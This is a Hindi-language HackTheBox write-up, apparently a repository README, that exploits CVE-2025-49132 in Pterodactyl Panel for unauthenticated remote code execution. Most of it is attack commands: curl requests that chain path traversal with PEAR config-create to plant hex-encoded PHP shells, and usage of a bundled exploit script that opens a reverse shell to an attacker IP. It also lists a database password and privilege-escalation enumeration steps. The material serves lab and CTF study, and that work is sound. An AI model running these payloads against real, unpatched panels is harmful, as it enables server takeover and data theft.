
CVE-2025-49132 के लिए शोषण जो Pterodactyl Panel को लक्षित करता है, अनधिकृत रिमोट कोड निष्पादन के लिए पथ ट्रैवर्सल को PEAR कमांड इंजेक्शन के साथ जोड़ता है। इसमें कमांड निष्पादन, रिवर्स शेल्स, और विशेषाधिकार वृद्धि मार्गदर्शन के लिए bash और Python स्क्रिप्ट शामिल हैं।
HTB सीज़न 10 - Pterodactyl Machine राइटअप
लक्ष्य: Pterodactyl HTB Machine (मध्यम कठिनाई)
CVE: CVE-2025-49132
गंभीरता: क्रिटिकल (CVSS 9.8)
हमले का प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
प्रभावित: Pterodactyl Panel < v1.11.11
यह शोषण श्रृंखला निम्नलिखित को जोड़ती है:
Pterodactyl Panel का /locales/locale.json एंडपॉइंट locale पैरामीटर के माध्यम से पथ ट्रैवर्सल की अनुमति देता है:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
इसे PEAR के pearcmd.php के साथ जोड़ा जा सकता है:
/tmp में मनमानी PHP फ़ाइलें लिखनाPEAR (PHP एक्सटेंशन और एप्लिकेशन रिपॉजिटरी) में एक CLI उपकरण (pearcmd.php) है जो:
config-create कमांड है जो फ़ाइलें लिखता हैशोषण श्रृंखला:
पथ ट्रैवर्सल → pearcmd.php लोड करें → config-create के माध्यम से PHP इंजेक्ट करें → दुर्भावनापूर्ण PHP निष्पादित करें
कमांड hex2bin() का उपयोग करके हेक्स-एन्कोडेड होते हैं ताकि बाईपास किया जा सके:
उदाहरण:
कमांड: whoami
हेक्स: 77686f616d69
पेलोड: <?=system(hex2bin('77686f616d69'))?>
विधि 1: प्रदान किए गए exploit.sh का उपयोग करना
chmod +x exploit.sh
# उपयोगकर्ता फ्लैग प्राप्त करें
./exploit.sh flag
# कमांड निष्पादित करें
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# रिवर्स शेल
nc -lvnp 4444 # हमलावर मशीन पर
./exploit.sh shell 10.10.14.21 4444
विधि 2: मैन्युअल शोषण
# चरण 1: PHP शेल लिखें (हेक्स-एन्कोडेड "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"
# चरण 2: निष्पादित करें
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"
विधि 3: Python स्क्रिप्ट
मैंने exploit.py जोड़ा
**requests इंस्टॉल करें**
पूर्ण-सुविधा युक्त bash शोषण
./exploit.sh cmd "whoami" # एकल कमांड निष्पादित करें
./exploit.sh shell 10.10.14.21 4444 # रिवर्स शेल
./exploit.sh flag # उपयोगकर्ता फ्लैग खोजें
विशेषताएं:
विस्तृत तकनीकी दस्तावेज़ीकरण
इसमें शामिल है:
# 1. /etc/hosts में जोड़ें
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts
# 2. शोषण डाउनलोड करें
wget https://your-repo/exploit.sh
chmod +x exploit.sh
# 3. शेल प्राप्त करें
nc -lvnp 4444 # टर्मिनल 1
./exploit.sh shell 10.10.14.21 4444 # टर्मिनल 2
# 4. उपयोगकर्ता फ्लैग प्राप्त करें
cat /home/phileasfogg3/user.txt
# चल रही सेवाओं की जाँच करें
ss -tlnp
# मिला:
# 127.0.0.1:3306 - MySQL (रूट)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (रूट)
# 127.0.0.1:25 - Postfix
# sudo जाँचें
sudo -l
# (संभवतः पासवर्ड आवश्यक)
# SUID बाइनरी
find / -perm -4000 2>/dev/null
# क्रॉन जॉब
cat /etc/crontab
ls -la /etc/cron.*
mysql -u pterodactyl -pPteraPanel
# UDF इंजेक्शन, फ़ाइल लेखन अनुमतियों की जाँच करें
# FPM शोषण की जाँच करें (CVE-2019-11043 या कॉन्फ़िगरेशन दुरुपयोग)
# प्रमाणीकरण बाईपास, cron के माध्यम से RCE की जाँच करें
redis-cli -h 127.0.0.1
find /etc/cron* -writable 2>/dev/null
uname -a
# DirtyCow आदि की जाँच करें